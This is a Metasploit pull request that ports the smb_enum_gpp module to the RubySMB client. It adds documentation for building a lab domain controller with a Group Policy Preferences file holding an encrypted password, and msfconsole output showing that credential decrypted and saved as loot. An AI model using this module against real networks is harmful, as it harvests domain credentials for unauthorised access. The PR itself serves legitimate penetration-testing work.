### PR TITLE
Update smb_enum_gpp to use RubySMB

### DIFF
--- a/documentation/modules/auxiliary/scanner/smb/smb_enum_gpp.md
+++ b/documentation/modules/auxiliary/scanner/smb/smb_enum_gpp.md
@@ -1,0 +1,77 @@
+## Vulnerable Application
+
+This module enumerates files from target domain controllers and connects to them via SMB. It then looks for Group Policy
+Preference XML files containing local/domain user accounts and passwords and decrypts them using Microsoft's public AES
+key. This module has been tested successfully on a Win2k8 R2 Domain Controller.
+
+### Test Environment
+
+This vulnerability was patched in 2014 but Group Policy Prefence files can still be found in modern environments. Because of that it is
+necessary to have a means to test this vulnerability in a contrived way.
+
+Starting from a Windows Server that has been configured as an Active Directory Domain Controller:
+1. Navigate to: `%SystemRoot%\SYSVOL\sysvol\$domain\Policies` where `$domain` is the name of the domain.
+1. Create a subfolder. These folders typically use UUIDs within braces (e.g. `{31B2F340-016D-11D2-945F-00C04FB984F9}`) but the name does not
+   matter for testing purposes.
+1. In the new a new file (and the necessary parent folders) `MACHINE\Preferences\Groups\Groups.xml`.
+1. Place the contents below in the new `Groups.xml` file.
+
+```
+<?xml version="1.0" encoding="utf-8"?>
+<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
+	<User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="SuperSecretBackdoor" image="0" changed="2013-04-25 18:36:07" uid="{B5EDB865-34F5-4BD7-9C59-3AEB1C7A68C3}">
+		<Properties action="C" fullName="" description="" cpassword="VBQUNbDhuVti3/GHTGHPvcno2vH3y8e8m1qALVO1H3T0rdkr2rub1smfTtqRBRI3" changeLogon="0" noChange="0" neverExpires="1" acctDisabled="0" userName="SuperSecretBackdoor"/>
+	</User>
+</Groups>
+```
+
+This example XML data was taken from the unit test.
+
+## Verification Steps
+Example steps in this format (is also in the PR):
+
+1. Start msfconsole
+1. Do: `use auxiliary/scanner/smb/smb_enum_gpp`
+1. Do: `set RHOSTS ...`
+1. Do: `set SMBUser ...`
+1. Do: `set SMBPass ...`
+1. Do: `run`
+
+### Windows Server 2019 (Test Setup)
+
+The following example use the contrived setup from the "Test Environment" section.
+
+```
+msf6 auxiliary(scanner/smb/smb_enum_gpp) > use auxiliary/scanner/smb/smb_enum_gpp 
+msf6 auxiliary(scanner/smb/smb_enum_gpp) > set RHOSTS 192.168.159.10
+RHOSTS => 192.168.159.10
+msf6 auxiliary(scanner/smb/smb_enum_gpp) > set SMBUSER smcintyre
+SMBUSER => smcintyre
+msf6 auxiliary(scanner/smb/smb_enum_gpp) > set SMBPass Password1
+SMBPass => Password1
+msf6 auxiliary(scanner/smb/smb_enum_gpp) > run
+
+[*] 192.168.159.10:445    - Connecting to the server...
+[*] 192.168.159.10:445    - Mounting the remote share \\192.168.159.10\SYSVOL'...
+[+] 192.168.159.10:445    - Found Policy Share on 192.168.159.10
+[*] 192.168.159.10:445    - Parsing file: \\192.168.159.10\SYSVOL\msflab.local\Policies\fake\MACHINE\Preferences\Groups\Groups.xml
+[+] 192.168.159.10:445    - Group Policy Credential Info
+============================
+
+ Name               Value
+ ----               -----
+ TYPE               Groups.xml
+ USERNAME           SuperSecretBackdoor
+ PASSWORD           Super!!!Password
+ DOMAIN CONTROLLER  192.168.159.10
+ DOMAIN             msflab.local
+ CHANGED            2013-04-25 18:36:07
+ NEVER_EXPIRES?     1
+ DISABLED           0
+
+[+] 192.168.159.10:445    - XML file saved to: /home/smcintyre/.msf4/loot/20200828163158_default_192.168.159.10_microsoft.window_053830.txt
+[+] 192.168.159.10:445    - Groups.xml saved as: /home/smcintyre/.msf4/loot/20200828163158_default_192.168.159.10_smb.shares.file_279441.xml
+[*] 192.168.159.10:445    - Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf6 auxiliary(scanner/smb/smb_enum_gpp) >
+```

--- a/lib/msf/core/exploit/smb/client.rb
+++ b/lib/msf/core/exploit/smb/client.rb
@@ -97,9 +97,11 @@ module Msf
       #
       # @param (see Exploit::Remote::Tcp#connect)
       # @return (see Exploit::Remote::Tcp#connect)
-      def connect(global=true, versions: [])
+      def connect(global=true, versions: [], backend: nil)
         if versions.nil? || versions.empty?
           versions = datastore['SMB::ProtocolVersion'].split(',').map(&:to_i)
+          # if the user explicitly set the protocol version to 1, still use ruby_smb
+          backend ||= :ruby_smb if versions == [1]
         end
 
         disconnect() if global
@@ -114,7 +116,7 @@ module Msf
           direct = false
         end
 
-        c = Rex::Proto::SMB::SimpleClient.new(s, direct, versions, always_encrypt: datastore['SMB::AlwaysEncrypt'])
+        c = Rex::Proto::SMB::SimpleClient.new(s, direct, versions, always_encrypt: datastore['SMB::AlwaysEncrypt'], backend: backend)
 
         # setup pipe evasion foo
         if datastore['SMB::pipe_evasion']

--- a/lib/rex/proto/smb/simpleclient.rb
+++ b/lib/rex/proto/smb/simpleclient.rb
@@ -31,16 +31,16 @@ attr_accessor :last_error, :server_max_buffer_size
 attr_accessor :socket, :client, :direct, :shares, :last_share, :versions
 
   # Pass the socket object and a boolean indicating whether the socket is netbios or cifs
-  def initialize(socket, direct = false, versions = [1, 2, 3], always_encrypt: true)
+  def initialize(socket, direct = false, versions = [1, 2, 3], always_encrypt: true, backend: nil)
     self.socket = socket
     self.direct = direct
     self.versions = versions
     self.shares = {}
     self.server_max_buffer_size = 1024 # 4356 (workstation) or 16644 (server) expected
 
-    if self.versions == [1]
+    if (self.versions == [1] && backend.nil?) || backend == :rex
       self.client = Rex::Proto::SMB::Client.new(socket)
-    else
+    elsif (backend.nil? || backend == :ruby_smb)
       self.client = RubySMB::Client.new(RubySMB::Dispatcher::Socket.new(self.socket, read_timeout: 60),
                                         username: '',
                                         password: '',


### PR DESCRIPTION
This updates the `auxiliary/scanner/smb/smb_enum_gpp` module to use RubySMB instead of the old Rex client. By extension it now supports SMB version 1-3. Despite this being a pretty old vulnerability, it can still be occasionally found within environments and when it is yields privileged access without any kind of exploitation. I also added some basic module docs describing how to setup a test environment and an output sample.

The primary issue with updating this was removing the modules use of `find_first` which from what I can tell is not implemented in SMB2/SMB3. Instead, I now opt to do a tree connect and then list the directory. I tested this on a Server 2019 installation using the setup steps that I added to the documentation with SMB versions 1 and 3 (since the tree is a different object between 1 and 2/3).

~~**Note:** To test SMB version 1, you can not just `set SMB::ProtocolVersion 1`, that'll actually break the module because specifying only version 1 will cause the old Rex client to be used which isn't supported anymore. To use version 1, you need to leave the settings at their default value and instead disable SMB version 2/3 on the server using the steps from [here](https://docs.microsoft.com/en-us/windows-server/storage/file-server/troubleshoot/detect-enable-and-disable-smbv1-v2-v3). Use the `smb_version` module to detect the versions as necessary.~~
**Update:** I changed this behavior in commit 58a56a2b2431be9f9be2045f10d555ec4156cefa. It seems to me that if the module author writes a module expecting that the SMB client will always be RubySMB then it should be RubySMB even if the user specifies that they only want to use SMB protocol version 1. This might be the case if they're testing SMBv1 for something in their environment. In the commit where I correct this behavior, I added a new `backend` argument defaulting to `nil` / automatic that can be used to specify either `:rex` or `:ruby_smb`. Now when the mixin code identifies that the user only wants to use protocol version 1, it'll set the `backend` to `:ruby_smb` (if it hasn't already been defined) so that the module has a consistent interface. From what I can tell, modules that are currently Rex-only specify `connect(version: [1])` and `deregister_options('SMB::ProtocolVersion')`.

## Verification

List the steps needed to make sure this thing works

- [ ] Start `msfconsole`
- [ ] `use auxiliary/scanner/smb/smb_enum_gpp`
- [ ] Set the `RHOSTS`, `SMBUser` and `SMBPass` options as appropriate
- [ ] Run the module, you should see an account recovered

## Example Output

```
msf6 auxiliary(scanner/smb/smb_enum_gpp) > use auxiliary/scanner/smb/smb_enum_gpp 
msf6 auxiliary(scanner/smb/smb_enum_gpp) > set RHOSTS 192.168.159.10
RHOSTS => 192.168.159.10
msf6 auxiliary(scanner/smb/smb_enum_gpp) > set SMBUSER smcintyre
SMBUSER => smcintyre
msf6 auxiliary(scanner/smb/smb_enum_gpp) > set SMBPass Password1
SMBPass => Password1
msf6 auxiliary(scanner/smb/smb_enum_gpp) > run
[*] 192.168.159.10:445    - Connecting to the server...
[*] 192.168.159.10:445    - Mounting the remote share \\192.168.159.10\SYSVOL'...
[+] 192.168.159.10:445    - Found Policy Share on 192.168.159.10
[*] 192.168.159.10:445    - Parsing file: \\192.168.159.10\SYSVOL\msflab.local\Policies\fake\MACHINE\Preferences\Groups\Groups.xml
[+] 192.168.159.10:445    - Group Policy Credential Info
============================
 Name               Value
 ----               -----
 TYPE               Groups.xml
 USERNAME           SuperSecretBackdoor
 PASSWORD           Super!!!Password
 DOMAIN CONTROLLER  192.168.159.10
 DOMAIN             msflab.local
 CHANGED            2013-04-25 18:36:07
 NEVER_EXPIRES?     1
 DISABLED           0
[+] 192.168.159.10:445    - XML file saved to: /home/smcintyre/.msf4/loot/20200828163158_default_192.168.159.10_microsoft.window_053830.txt
[+] 192.168.159.10:445    - Groups.xml saved as: /home/smcintyre/.msf4/loot/20200828163158_default_192.168.159.10_smb.shares.file_279441.xml
[*] 192.168.159.10:445    - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/smb/smb_enum_gpp) >
```